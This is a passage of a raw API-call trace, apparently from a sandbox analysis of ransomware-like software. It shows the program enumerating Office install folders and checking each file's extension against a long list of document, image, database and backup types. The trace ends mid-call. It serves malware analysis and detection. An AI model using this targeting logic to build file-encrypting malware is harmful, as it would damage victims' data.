lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1306082b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x393a40, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ACCICONS.EXE", cAlternateFileName="")) returned 1 [0292.425] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0292.425] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33860, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ACCWIZ.DLL", cAlternateFileName="")) returned 1 [0292.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0292.556] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bg", cAlternateFileName="")) returned 1 [0292.982] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0292.982] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca", cAlternateFileName="")) returned 1 [0292.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca") returned 104 [0292.993] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca") returned 1 [0292.993] lstrlenW (lpString="ca") returned 2 [0292.993] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="ca") returned -1 [0292.993] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4137f20 [0292.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca") returned 104 [0292.993] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ca\\*", lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0292.998] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0292.998] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8e918 | out: lpFindFileData=0x2e8e918*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4cfbc75, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4cfbc75, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0292.998] lstrlenW (lpString="Microsoft.Mashup.Client.Excel.resources.dll") returned 43 [0292.998] lstrlenW (lpString=".1cd") returned 4 [0292.998] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0292.998] lstrlenW (lpString=".3ds") returned 4 [0292.998] lstrcmpiW (lpString1=".3ds", lpString2=".dll") returned -1 [0292.998] lstrlenW (lpString=".3fr") returned 4 [0292.998] lstrcmpiW (lpString1=".3fr", lpString2=".dll") returned -1 [0292.998] lstrlenW (lpString=".3g2") returned 4 [0292.998] lstrcmpiW (lpString1=".3g2", lpString2=".dll") returned -1 [0292.998] lstrlenW (lpString=".3gp") returned 4 [0292.998] lstrcmpiW (lpString1=".3gp", lpString2=".dll") returned -1 [0292.998] lstrlenW (lpString=".7z") returned 3 [0292.998] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0292.998] lstrlenW (lpString=".accda") returned 6 [0292.998] lstrcmpiW (lpString1=".accda", lpString2="es.dll") returned -1 [0292.999] lstrlenW (lpString=".accdb") returned 6 [0292.999] lstrcmpiW (lpString1=".accdb", lpString2="es.dll") returned -1 [0292.999] lstrlenW (lpString=".accdc") returned 6 [0292.999] lstrcmpiW (lpString1=".accdc", lpString2="es.dll") returned -1 [0292.999] lstrlenW (lpString=".accde") returned 6 [0292.999] lstrcmpiW (lpString1=".accde", lpString2="es.dll") returned -1 [0292.999] lstrlenW (lpString=".accdt") returned 6 [0292.999] lstrcmpiW (lpString1=".accdt", lpString2="es.dll") returned -1 [0292.999] lstrlenW (lpString=".accdw") returned 6 [0292.999] lstrcmpiW (lpString1=".accdw", lpString2="es.dll") returned -1 [0292.999] lstrlenW (lpString=".adb") returned 4 [0292.999] lstrcmpiW (lpString1=".adb", lpString2=".dll") returned -1 [0292.999] lstrlenW (lpString=".adp") returned 4 [0292.999] lstrcmpiW (lpString1=".adp", lpString2=".dll") returned -1 [0292.999] lstrlenW (lpString=".ai") returned 3 [0292.999] lstrcmpiW (lpString1=".ai", lpString2="dll") returned -1 [0292.999] lstrlenW (lpString=".ai3") returned 4 [0292.999] lstrcmpiW (lpString1=".ai3", lpString2=".dll") returned -1 [0292.999] lstrlenW (lpString=".ai4") returned 4 [0292.999] lstrcmpiW (lpString1=".ai4", lpString2=".dll") returned -1 [0292.999] lstrlenW (lpString=".ai5") returned 4 [0292.999] lstrcmpiW (lpString1=".ai5", lpString2=".dll") returned -1 [0292.999] lstrlenW (lpString=".ai6") returned 4 [0292.999] lstrcmpiW (lpString1=".ai6", lpString2=".dll") returned -1 [0292.999] lstrlenW (lpString=".ai7") returned 4 [0292.999] lstrcmpiW (lpString1=".ai7", lpString2=".dll") returned -1 [0292.999] lstrlenW (lpString=".ai8") returned 4 [0292.999] lstrcmpiW (lpString1=".ai8", lpString2=".dll") returned -1 [0292.999] lstrlenW (lpString=".anim") returned 5 [0293.000] lstrcmpiW (lpString1=".anim", lpString2="s.dll") returned -1 [0293.000] lstrlenW (lpString=".arw") returned 4 [0293.000] lstrcmpiW (lpString1=".arw", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".as") returned 3 [0293.000] lstrcmpiW (lpString1=".as", lpString2="dll") returned -1 [0293.000] lstrlenW (lpString=".asa") returned 4 [0293.000] lstrcmpiW (lpString1=".asa", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".asc") returned 4 [0293.000] lstrcmpiW (lpString1=".asc", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".ascx") returned 5 [0293.000] lstrcmpiW (lpString1=".ascx", lpString2="s.dll") returned -1 [0293.000] lstrlenW (lpString=".asm") returned 4 [0293.000] lstrcmpiW (lpString1=".asm", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".asmx") returned 5 [0293.000] lstrcmpiW (lpString1=".asmx", lpString2="s.dll") returned -1 [0293.000] lstrlenW (lpString=".asp") returned 4 [0293.000] lstrcmpiW (lpString1=".asp", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".aspx") returned 5 [0293.000] lstrcmpiW (lpString1=".aspx", lpString2="s.dll") returned -1 [0293.000] lstrlenW (lpString=".asr") returned 4 [0293.000] lstrcmpiW (lpString1=".asr", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".asx") returned 4 [0293.000] lstrcmpiW (lpString1=".asx", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".avi") returned 4 [0293.000] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".avs") returned 4 [0293.000] lstrcmpiW (lpString1=".avs", lpString2=".dll") returned -1 [0293.000] lstrlenW (lpString=".backup") returned 7 [0293.000] lstrcmpiW (lpString1=".backup", lpString2="ces.dll") returned -1 [0293.000] lstrlenW (lpString=".bak") returned 4 [0293.000] lstrcmpiW (lpString1=".bak", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".bay") returned 4 [0293.001] lstrcmpiW (lpString1=".bay", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".bd") returned 3 [0293.001] lstrcmpiW (lpString1=".bd", lpString2="dll") returned -1 [0293.001] lstrlenW (lpString=".bin") returned 4 [0293.001] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".bmp") returned 4 [0293.001] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".bz2") returned 4 [0293.001] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".c") returned 2 [0293.001] lstrcmpiW (lpString1=".c", lpString2="ll") returned -1 [0293.001] lstrlenW (lpString=".cdr") returned 4 [0293.001] lstrcmpiW (lpString1=".cdr", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".cer") returned 4 [0293.001] lstrcmpiW (lpString1=".cer", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".cf") returned 3 [0293.001] lstrcmpiW (lpString1=".cf", lpString2="dll") returned -1 [0293.001] lstrlenW (lpString=".cfc") returned 4 [0293.001] lstrcmpiW (lpString1=".cfc", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".cfm") returned 4 [0293.001] lstrcmpiW (lpString1=".cfm", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".cfml") returned 5 [0293.001] lstrcmpiW (lpString1=".cfml", lpString2="s.dll") returned -1 [0293.001] lstrlenW (lpString=".cfu") returned 4 [0293.001] lstrcmpiW (lpString1=".cfu", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".chm") returned 4 [0293.001] lstrcmpiW (lpString1=".chm", lpString2=".dll") returned -1 [0293.001] lstrlenW (lpString=".cin") returned 4 [0293.001] lstrcmpiW (lpString1=".cin", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".class") returned 6 [0293.002] lstrcmpiW (lpString1=".class", lpString2="es.dll") returned -1 [0293.002] lstrlenW (lpString=".clx") returned 4 [0293.002] lstrcmpiW (lpString1=".clx", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".config") returned 7 [0293.002] lstrcmpiW (lpString1=".config", lpString2="ces.dll") returned -1 [0293.002] lstrlenW (lpString=".cpp") returned 4 [0293.002] lstrcmpiW (lpString1=".cpp", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".cr2") returned 4 [0293.002] lstrcmpiW (lpString1=".cr2", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".crt") returned 4 [0293.002] lstrcmpiW (lpString1=".crt", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".crw") returned 4 [0293.002] lstrcmpiW (lpString1=".crw", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".cs") returned 3 [0293.002] lstrcmpiW (lpString1=".cs", lpString2="dll") returned -1 [0293.002] lstrlenW (lpString=".css") returned 4 [0293.002] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".csv") returned 4 [0293.002] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".cub") returned 4 [0293.002] lstrcmpiW (lpString1=".cub", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".dae") returned 4 [0293.002] lstrcmpiW (lpString1=".dae", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".dat") returned 4 [0293.002] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0293.002] lstrlenW (lpString=".db") returned 3 [0293.002] lstrcmpiW (lpString1=".db", lpString2="dll") returned -1 [0293.002] lstrlenW (lpString=".dbf") returned 4 [0293.003] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".dbx") returned 4 [0293.003] lstrcmpiW (lpString1=".dbx", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".dc3") returned 4 [0293.003] lstrcmpiW (lpString1=".dc3", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".dcm") returned 4 [0293.003] lstrcmpiW (lpString1=".dcm", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".dcr") returned 4 [0293.003] lstrcmpiW (lpString1=".dcr", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".der") returned 4 [0293.003] lstrcmpiW (lpString1=".der", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".dib") returned 4 [0293.003] lstrcmpiW (lpString1=".dib", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".dic") returned 4 [0293.003] lstrcmpiW (lpString1=".dic", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".dif") returned 4 [0293.003] lstrcmpiW (lpString1=".dif", lpString2=".dll") returned -1 [0293.003] lstrlenW (lpString=".divx") returned 5 [0293.003] lstrcmpiW (lpString1=".divx", lpString2="s.dll") returned -1 [0293.003] lstrlenW (lpString=".djvu") returned 5 [0293.003] lstrcmpiW (lpString1=".djvu", lpString2="s.dll") returned -1 [0293.003] lstrlenW (lpString=".dng") returned 4 [0293.003] lstrcmpiW (lpString1=".dng", lpString2=".dll") returned 1 [0293.003] lstrlenW (lpString=".doc") returned 4 [0293.003] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0293.003] lstrlenW (lpString=".docm") returned 5 [0293.003] lstrcmpiW (lpString1=".docm", lpString2="s.dll") returned -1 [0293.003] lstrlenW (lpString=".docx") returned 5 [0293.003] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0293.003] lstrlenW (lpString=".dot") returned 4 [0293.003] lstrcmpiW (lpString1=".dot", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".dotm") returned 5 [0293.004] lstrcmpiW (lpString1=".dotm", lpString2="s.dll") returned -1 [0293.004] lstrlenW (lpString=".dotx") returned 5 [0293.004] lstrcmpiW (lpString1=".dotx", lpString2="s.dll") returned -1 [0293.004] lstrlenW (lpString=".dpx") returned 4 [0293.004] lstrcmpiW (lpString1=".dpx", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".dqy") returned 4 [0293.004] lstrcmpiW (lpString1=".dqy", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".dsn") returned 4 [0293.004] lstrcmpiW (lpString1=".dsn", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".dt") returned 3 [0293.004] lstrcmpiW (lpString1=".dt", lpString2="dll") returned -1 [0293.004] lstrlenW (lpString=".dtd") returned 4 [0293.004] lstrcmpiW (lpString1=".dtd", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".dwg") returned 4 [0293.004] lstrcmpiW (lpString1=".dwg", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".dwt") returned 4 [0293.004] lstrcmpiW (lpString1=".dwt", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".dx") returned 3 [0293.004] lstrcmpiW (lpString1=".dx", lpString2="dll") returned -1 [0293.004] lstrlenW (lpString=".dxf") returned 4 [0293.004] lstrcmpiW (lpString1=".dxf", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".edml") returned 5 [0293.004] lstrcmpiW (lpString1=".edml", lpString2="s.dll") returned -1 [0293.004] lstrlenW (lpString=".efd") returned 4 [0293.004] lstrcmpiW (lpString1=".efd", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".elf") returned 4 [0293.004] lstrcmpiW (lpString1=".elf", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".emf") returned 4 [0293.004] lstrcmpiW (lpString1=".emf", lpString2=".dll") returned 1 [0293.004] lstrlenW (lpString=".emz") returned 4 [0293.005] lstrcmpiW (lpString1=".emz", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".epf") returned 4 [0293.005] lstrcmpiW (lpString1=".epf", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".eps") returned 4 [0293.005] lstrcmpiW (lpString1=".eps", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".epsf") returned 5 [0293.005] lstrcmpiW (lpString1=".epsf", lpString2="s.dll") returned -1 [0293.005] lstrlenW (lpString=".epsp") returned 5 [0293.005] lstrcmpiW (lpString1=".epsp", lpString2="s.dll") returned -1 [0293.005] lstrlenW (lpString=".erf") returned 4 [0293.005] lstrcmpiW (lpString1=".erf", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".exr") returned 4 [0293.005] lstrcmpiW (lpString1=".exr", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".f4v") returned 4 [0293.005] lstrcmpiW (lpString1=".f4v", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".fido") returned 5 [0293.005] lstrcmpiW (lpString1=".fido", lpString2="s.dll") returned -1 [0293.005] lstrlenW (lpString=".flm") returned 4 [0293.005] lstrcmpiW (lpString1=".flm", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".flv") returned 4 [0293.005] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".frm") returned 4 [0293.005] lstrcmpiW (lpString1=".frm", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".fxg") returned 4 [0293.005] lstrcmpiW (lpString1=".fxg", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".geo") returned 4 [0293.005] lstrcmpiW (lpString1=".geo", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".gif") returned 4 [0293.005] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".grs") returned 4 [0293.005] lstrcmpiW (lpString1=".grs", lpString2=".dll") returned 1 [0293.005] lstrlenW (lpString=".gz") returned 3 [0293.006] lstrcmpiW (lpString1=".gz", lpString2="dll") returned -1 [0293.006] lstrlenW (lpString=".h") returned 2 [0293.006] lstrcmpiW (lpString1=".h", lpString2="ll") returned -1 [0293.006] lstrlenW (lpString=".hdr") returned 4 [0293.006] lstrcmpiW (lpString1=".hdr", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".hpp") returned 4 [0293.006] lstrcmpiW (lpString1=".hpp", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".hta") returned 4 [0293.006] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".htc") returned 4 [0293.006] lstrcmpiW (lpString1=".htc", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".htm") returned 4 [0293.006] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".html") returned 5 [0293.006] lstrcmpiW (lpString1=".html", lpString2="s.dll") returned -1 [0293.006] lstrlenW (lpString=".icb") returned 4 [0293.006] lstrcmpiW (lpString1=".icb", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".ics") returned 4 [0293.006] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".iff") returned 4 [0293.006] lstrcmpiW (lpString1=".iff", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".inc") returned 4 [0293.006] lstrcmpiW (lpString1=".inc", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".indd") returned 5 [0293.006] lstrcmpiW (lpString1=".indd", lpString2="s.dll") returned -1 [0293.006] lstrlenW (lpString=".ini") returned 4 [0293.006] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".iqy") returned 4 [0293.006] lstrcmpiW (lpString1=".iqy", lpString2=".dll") returned 1 [0293.006] lstrlenW (lpString=".j2c") returned 4 [0293.007] lstrcmpiW (lpString1=".j2c", lpString2=".dll") returned 1 [0293.007] lstrlenW (lpString=".j2k") returned 4 [0293.007] lstrcmpiW (lpString1=".j2k", lpString2=".dll") returned 1 [0293.007] lstrlenW (lpString=".java") returned 5 [0293.007] lstrcmpiW (lpString1=".java", lpString2="s.dll") returned -1 [0293.007] lstrlenW (lpString=".jp2") returned 4 [0293.009] lstrcmpiW (lpString1=".jp2", lpString2=".dll") returned 1 [0293.009] lstrlenW (lpString=".jpc") returned 4 [0293.009] lstrcmpiW (lpString1=".jpc", lpString2=".dll") returned 1 [0293.009] lstrlenW (lpString=".jpe") returned 4 [0293.009] lstrcmpiW (lpString1=".jpe", lpString2=".dll") returned 1 [0293.009] lstrlenW (lpString=".jpeg") returned 5 [0293.009] lstrcmpiW (lpString1=".jpeg", lpString2="s.dll") returned -1 [0293.009] lstrlenW (lpString=".jpf") returned 4 [0293.009] lstrcmpiW (lpString1=".jpf", lpString2=".dll") returned 1 [0293.009] lstrlenW (lpString=".jpg") returned 4 [0293.009] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0293.009] lstrlenW (lpString=".jpx") returned 4 [0293.009] lstrcmpiW (lpString1=".jpx", lpString2=".dll") returned 1 [0293.009] lstrlenW (lpString=".js") returned 3 [0293.009] lstrcmpiW (lpString1=".js", lpString2="dll") returned -1 [0293.009] lstrlenW (lpString=".jsf") returned 4 [0293.009] lstrcmpiW (lpString1=".jsf", lpString2=".dll") returned 1 [0293.009] lstrlenW (lpString=".json") returned 5 [0293.009] lstrcmpiW (lpString1=".json", lpString2="s.dll") returned -1 [0293.009] lstrlenW (lpString=".jsp") returned 4 [0293.009] lstrcmpiW (lpString1=".jsp", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".kdc") returned 4 [0293.010] lstrcmpiW (lpString1=".kdc", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".kmz") returned 4 [0293.010] lstrcmpiW (lpString1=".kmz", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".kwm") returned 4 [0293.010] lstrcmpiW (lpString1=".kwm", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".lasso") returned 6 [0293.010] lstrcmpiW (lpString1=".lasso", lpString2="es.dll") returned -1 [0293.010] lstrlenW (lpString=".lbi") returned 4 [0293.010] lstrcmpiW (lpString1=".lbi", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".lgf") returned 4 [0293.010] lstrcmpiW (lpString1=".lgf", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".lgp") returned 4 [0293.010] lstrcmpiW (lpString1=".lgp", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".log") returned 4 [0293.010] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".m1v") returned 4 [0293.010] lstrcmpiW (lpString1=".m1v", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".m4a") returned 4 [0293.010] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".m4v") returned 4 [0293.010] lstrcmpiW (lpString1=".m4v", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".max") returned 4 [0293.010] lstrcmpiW (lpString1=".max", lpString2=".dll") returned 1 [0293.010] lstrlenW (lpString=".md") returned 3 [0293.011] lstrcmpiW (lpString1=".md", lpString2="dll") returned -1 [0293.011] lstrlenW (lpString=".mda") returned 4 [0293.011] lstrcmpiW (lpString1=".mda", lpString2=".dll") returned 1 [0293.011] lstrlenW (lpString=".mdb") returned 4 [0293.011] lstrcmpiW (lpString1=".mdb", lpString2=".dll") returned 1 [0293.011] lstrlenW (lpString=".mde") returned 4 [0293.012] lstrcmpiW (lpString1=".mde", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mdf") returned 4 [0293.012] lstrcmpiW (lpString1=".mdf", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mdw") returned 4 [0293.012] lstrcmpiW (lpString1=".mdw", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mef") returned 4 [0293.012] lstrcmpiW (lpString1=".mef", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mft") returned 4 [0293.012] lstrcmpiW (lpString1=".mft", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mfw") returned 4 [0293.012] lstrcmpiW (lpString1=".mfw", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mht") returned 4 [0293.012] lstrcmpiW (lpString1=".mht", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mhtml") returned 6 [0293.012] lstrcmpiW (lpString1=".mhtml", lpString2="es.dll") returned -1 [0293.012] lstrlenW (lpString=".mka") returned 4 [0293.012] lstrcmpiW (lpString1=".mka", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mkidx") returned 6 [0293.012] lstrcmpiW (lpString1=".mkidx", lpString2="es.dll") returned -1 [0293.012] lstrlenW (lpString=".mkv") returned 4 [0293.012] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mos") returned 4 [0293.012] lstrcmpiW (lpString1=".mos", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mov") returned 4 [0293.012] lstrcmpiW (lpString1=".mov", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mp3") returned 4 [0293.012] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mp4") returned 4 [0293.012] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0293.012] lstrlenW (lpString=".mpeg") returned 5 [0293.013] lstrcmpiW (lpString1=".mpeg", lpString2="s.dll") returned -1 [0293.013] lstrlenW (lpString=".mpg") returned 4 [0293.013] lstrcmpiW (lpString1=".mpg", lpString2=".dll") returned 1 [0293.013] lstrlenW (lpString=".mpv") returned 4 [0293.013] lstrcmpiW (lpString1=".mpv", lpString2=".dll") returned 1 [0293.013] lstrlenW (lpString=".mrw") returned 4 [0293.013] lstrcmpiW (lpString1=".mrw", lpString2=".dll") returned 1 [0293.013] lstrlenW (lpString=".msg") returned 4 [0293.013] lstrcmpiW (lpString1=".msg", lpString2=".dll") returned 1 [0293.013] lstrlenW (lpString=".mxl") returned 4 [0293.013] lstrcmpiW (lpString1=".mxl", lpString2=".dll") returned 1 [0293.013] lstrlenW (lpString=".myd") returned 4 [0293.013] lstrcmpiW (lpString1=".myd", lpString2=".dll") returned 1 [0293.013] lstrlenW (lpString=".myi") returned 4 [0293.013] lstrcmpiW (lpString1=".myi", lpString2=".dll") returned 1 [0293.013] lstrlenW (lpString=".nef") returned 4 [0293.013] lstrcmpiW (lpString1=".nef", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".nrw") returned 4 [0293.015] lstrcmpiW (lpString1=".nrw", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".obj") returned 4 [0293.015] lstrcmpiW (lpString1=".obj", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".odb") returned 4 [0293.015] lstrcmpiW (lpString1=".odb", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".odc") returned 4 [0293.015] lstrcmpiW (lpString1=".odc", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".odm") returned 4 [0293.015] lstrcmpiW (lpString1=".odm", lpString2=".dll") returned 1 [0293.015] lstrlenW (lpString=".odp") returned 4 [0293.015] lstrcmpiW (lpString1=".odp", 